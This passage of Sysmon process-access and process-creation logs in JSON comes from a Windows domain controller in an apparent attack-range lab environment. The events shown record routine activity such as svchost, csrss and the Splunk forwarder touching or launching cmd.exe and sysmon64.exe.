C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-00105B0A0400}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-00105B0A0400}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.316\r\nProcessGuid: {41C8662E-1F79-5F25-0000-0010330C0400}\r\nProcessId: 4048\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.316","ProcessGuid":"{41C8662E-1F79-5F25-0000-0010330C0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-0010330C0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-0010330C0400}","TargetProcessId":"4048","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-0010330C0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-0010330C0400}","TargetProcessId":"4048","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.